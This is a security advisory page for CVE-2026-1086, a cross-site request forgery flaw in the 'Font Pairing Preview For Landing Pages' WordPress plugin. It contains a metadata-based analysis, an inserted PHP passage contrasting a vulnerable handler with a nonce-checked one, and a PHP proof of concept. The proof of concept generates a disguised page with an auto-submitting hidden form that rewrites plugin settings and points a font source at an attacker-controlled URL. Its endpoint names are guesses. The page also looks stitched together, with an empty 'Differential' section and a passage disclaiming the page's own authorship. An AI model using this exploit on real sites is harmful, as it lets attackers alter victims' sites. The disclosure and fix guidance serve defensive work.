Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-1086: Font Pairing Preview For Landing Pages <= 1.3 – Cross-Site Request Forgery to Settings Update (wp-font-pairing-preview)

CVE ID CVE-2026-1086
Severity Medium (CVSS 4.3)
CWE 352
Vulnerable Version 1.3
Patched Version
Disclosed March 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1086 (metadata-based):
The vulnerability is a classic Cross-Site Request Forgery (CWE-352) in the Font Pairing Preview For Landing Pages WordPress plugin. The root cause is missing nonce validation on the plugin’s settings update functionality. WordPress requires nonces (number used once) to verify that requests originate from authenticated users and not from malicious third-party sites. The plugin’s settings update handler lacks this verification.

Atomic Edge research infers the exploitation method from WordPress plugin patterns. The plugin likely registers an AJAX action or admin-post handler for saving settings. A typical endpoint would be /wp-admin/admin-ajax.php with the action parameter containing a value like ‘wp_font_pairing_preview_save_settings’. Alternatively, it could use /wp-admin/admin-post.php with a similar action parameter. The attacker crafts a malicious link or form that submits a POST request to this endpoint with modified font pairing parameters. When an administrator with appropriate capabilities clicks the link while authenticated, the request executes with the administrator’s privileges.

Confirmed facts from the CVE description: the vulnerability exists up to version 1.3, allows unauthenticated attackers to modify font pairing settings via CSRF, and requires tricking an administrator into performing an action like clicking a link. Inferred from CWE 352 and WordPress context: the vulnerable endpoint is likely an AJAX or admin-post handler without nonce validation. The fix requires adding a nonce check using wp_verify_nonce() and a corresponding nonce field in the settings form. The impact is limited to modification of the plugin’s font pairing settings (C:N/I:L/A:N in CVSS). Attackers could disrupt site design or inject malicious font URLs if the plugin allows external font sources, but the description confirms only settings modification.
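The nonce fix the analysis calls for, shown as the vulnerable handler pattern beside its hardened form. This is an added illustration written for this page, not the plugin's code or Atomic Edge's; the hook, option and field names (fpp_save_settings, fpp_settings, fpp_save_settings_nonce) are assumed, following the admin-ajax pattern the analysis infers.

```php
<?php
// Added illustration, not the plugin's own code. The hook, option and field
// names (fpp_save_settings, fpp_settings, fpp_save_settings_nonce) are assumed.

// --- Vulnerable pattern: the CWE-352 condition the analysis describes ---
// Any POST that reaches admin-ajax.php?action=fpp_save_settings with an
// administrator's session cookie is accepted, whether or not the admin
// intended to send it. Shown for contrast only; not registered below.
function fpp_save_settings_vulnerable() {
    $settings = isset( $_POST['fpp_settings'] ) ? (array) $_POST['fpp_settings'] : array();
    update_option( 'fpp_settings', $settings );
    wp_send_json_success();
}

// --- Hardened pattern ---
// check_ajax_referer() verifies a nonce bound to the logged-in user and the
// action name; a cross-site form cannot know it, so the request dies before
// any state changes. current_user_can() is a separate authorization check:
// a nonce proves intent, not privilege. Fields are sanitized before storage.
function fpp_save_settings_hardened() {
    check_ajax_referer( 'fpp_save_settings', 'fpp_save_settings_nonce' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient permissions', 403 );
    }

    $raw      = isset( $_POST['fpp_settings'] ) ? (array) wp_unslash( $_POST['fpp_settings'] ) : array();
    $settings = array(
        'heading_font' => sanitize_text_field( $raw['heading_font'] ?? '' ),
        'body_font'    => sanitize_text_field( $raw['body_font'] ?? '' ),
        // esc_url_raw() drops unsafe schemes; an allow-list of font hosts would
        // further limit where a font file may be loaded from.
        'font_source'  => esc_url_raw( $raw['font_source'] ?? '' ),
    );
    update_option( 'fpp_settings', $settings );
    wp_send_json_success( $settings );
}
add_action( 'wp_ajax_fpp_save_settings', 'fpp_save_settings_hardened' );

// The settings form must emit the matching nonce field. The value is derived
// from the user's session and the action name, so a third-party page cannot
// predict it, and admin-ajax.php rejects the forged POST.
function fpp_render_settings_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-ajax.php' ) ) . '">';
    echo '<input type="hidden" name="action" value="fpp_save_settings">';
    wp_nonce_field( 'fpp_save_settings', 'fpp_save_settings_nonce' );
    echo '<input type="text" name="fpp_settings[heading_font]">';
    echo '<button type="submit">Save</button></form>';
}
```

With the nonce check in place, the auto-submitting form in the PoC below still reaches the endpoint, but check_ajax_referer() terminates the request with -1 before update_option() runs.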

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1086 - Font Pairing Preview For Landing Pages <= 1.3 - Cross-Site Request Forgery to Settings Update
//
// Note: the opening <?php tag must precede this header; anything before it
// is emitted verbatim into the generated HTML page.
/**
 * Proof of Concept for CVE-2026-1086
 * Assumptions based on WordPress plugin patterns:
 * 1. Plugin uses admin-ajax.php for settings updates
 * 2. AJAX action name derives from plugin slug: 'wp_font_pairing_preview_save_settings'
 * 3. Settings parameters include 'font_pairing' or similar
 * 4. No nonce validation present (the vulnerability)
 *
 * This script generates an HTML page with a hidden form that auto-submits.
 * When visited by an authenticated administrator, it changes plugin settings.
 */

$target_url = 'https://vulnerable-site.com'; // CHANGE THIS

// Inferred parameter names based on plugin functionality
$ajax_action = 'wp_font_pairing_preview_save_settings';
$settings_param = 'font_pairing_settings';

// Malicious settings payload - changes to a different font pairing
$malicious_settings = array(
    'heading_font' => 'Malicious Font',
    'body_font' => 'Compromised Font',
    'font_source' => 'https://attacker.com/malicious-font.woff2' // If plugin allows external URLs
);

?>
<!DOCTYPE html>
<html>
<head>
    <title>Benign Looking Page</title>
</head>
<body>
    <h1>Click here for special offer</h1>
    <p>This page contains a hidden form that exploits CVE-2026-1086.</p>
    
    <form id="exploit_form" method="POST" action="<?php echo htmlspecialchars($target_url); ?>/wp-admin/admin-ajax.php">
        <input type="hidden" name="action" value="<?php echo htmlspecialchars($ajax_action); ?>">
        <input type="hidden" name="<?php echo htmlspecialchars($settings_param); ?>" value="<?php echo htmlspecialchars(json_encode($malicious_settings)); ?>">
        <!-- Additional inferred parameters that might be required -->
        <input type="hidden" name="save" value="1">
    </form>
    
    <script>
        // Auto-submit the form after a short delay
        setTimeout(function() {
            document.getElementById('exploit_form').submit();
        }, 2000);
    </script>
</body>
</html>
